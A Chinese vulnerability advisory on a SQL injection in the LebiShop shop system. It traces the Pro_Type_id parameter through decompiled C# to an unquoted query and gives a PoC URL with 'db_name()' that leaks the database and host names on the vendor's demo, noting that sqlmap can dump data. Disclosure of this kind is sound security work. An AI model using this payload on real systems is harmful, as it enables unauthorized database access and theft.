|LebiShop商城系统最新版SQL注入五 - VULHUB开源网络安全威胁库

LebiShop商城系统最新版SQL注入五

- AV AC AU C I A

发布： 2025-04-13

修订： 2025-04-13

### 简要描述： LebiShop商城系统最新版SQL注入五 ### 详细说明： LebiShop商城系统最新版SQL注入一处文件Shop.supplier.Ajax.Ajax_product ``` // Shop.supplier.Ajax.Ajax_product public void Product_Batch_Price_Update() { if (!base.Power("supplier_product_batch_price", "批量调价")) { base.AjaxNoPower(); return; } string step = RequestTool.RequestString("step"); string dateFrom = RequestTool.RequestString("dateFrom"); string dateTo = RequestTool.RequestString("dateTo"); string Pro_Type_id = RequestTool.RequestString("Pro_Type_id"); int brand = RequestTool.RequestInt("brand", 0); int tag = RequestTool.RequestInt("tag", 0); int price_markettype = RequestTool.RequestInt("price_markettype", 0); int price_marketvalue = RequestTool.RequestInt("price_marketvalue", 0); int price_marketadd = RequestTool.RequestInt("price_marketadd", 0); int price_costtype = RequestTool.RequestInt("price_costtype", 0); int price_costvalue = RequestTool.RequestInt("price_costvalue", 0); int price_costadd = RequestTool.RequestInt("price_costadd", 0); int pricetype = RequestTool.RequestInt("pricetype", 0); int pricevalue = RequestTool.RequestInt("pricevalue", 0); int priceadd = RequestTool.RequestInt("priceadd", 0); int addtype = RequestTool.RequestInt("addtype", 0); int addvalue = RequestTool.RequestInt("addvalue", 0); int reducetype = RequestTool.RequestInt("reducetype", 0); int reducevalue = RequestTool.RequestInt("reducevalue", 0); string mes = ""; string where = "1=1"; if (dateFrom != "" && dateTo != "") { string text = where; where = string.Concat(new string[] { text, " and (datediff(d,Time_Add,'", dateFrom, "')<=0 and datediff(d,Time_Add,'", dateTo, "')>=0)" }); string text2 = mes; mes = string.Concat(new string[] { text2, "上架日期", dateFrom, "-", dateTo, ";" }); } if (Pro_Type_id != "") { where = where + " and Pro_Type_id in (" + EX_Product.Categoryid(Pro_Type_id) + ")"; mes = mes + "商品分类" + Pro_Type_id + ";"; } ``` 参数Pro_Type_id通过RequestTool.RequestString("Pro_Type_id")获取在RequestTool.RequestString方法中只进行了单引号的转换 ``` // Shop.Tools.RequestTool public static string RequestString(string nKey, string def) { string ojb = HttpContext.Current.Request.QueryString[nKey]; if (ojb != null) { return StringTool.InjectFiltrate(ojb.Trim()); } ojb = HttpContext.Current.Request.Form[nKey]; if (ojb != null) { return StringTool.InjectFiltrate(ojb.Trim()); } return def; } // Shop.Tools.StringTool public static string InjectFiltrate(string str) { if (!StringTool.IsSafeSqlString(str)) { str = str.Replace("'", "´"); } return str; } ``` 然后Pro_Type_id进入了EX_Product.Categoryid方法，跟进 ``` // Shop.Bussiness.EX_Product public static string Categoryid(string id) { string str = id.ToString(); List<Lebi_Pro_Type> ts = B_Lebi_Pro_Type.GetList("Parentid=" + id + " and IsShow = 1", "Sort desc"); foreach (Lebi_Pro_Type t in ts) { str = str + "," + EX_Product.Categoryid(string.Concat(t.id)); } return str; } ``` 然后Pro_Type_id最后进入了B_Lebi_Pro_Type.GetList方法，且没有使用单引号保护 ### 漏洞证明：官方demo演示报出当前数据库 ``` http://plus.demo.lebi.cn/supplier/ajax/ajax_product.aspx?__Action=Product_Batch_Price_Update&url=/ Pro_Type_id=db_name() ``` [<img src="https://images.seebug.org/upload/201501/201638552ffddccb4f18fab2245c1cc0f964600e.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/201638552ffddccb4f18fab2245c1cc0f964600e.png) 报出servername，服务器主机名 [<img src="https://images.seebug.org/upload/201501/201640069ec30eb57be4dede9a55e91547e43153.png" alt="2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/201640069ec30eb57be4dede9a55e91547e43153.png) sqlmap即可跑出数据

漏洞利用/PoC

暂无可用Exp或PoC

受影响的平台与产品

当前有0条受影响产品信息

您还没有登录，登录后可查看更多

添加资源
收藏资源
问题反馈

贡献用户

暂无贡献用户

VULHUB ™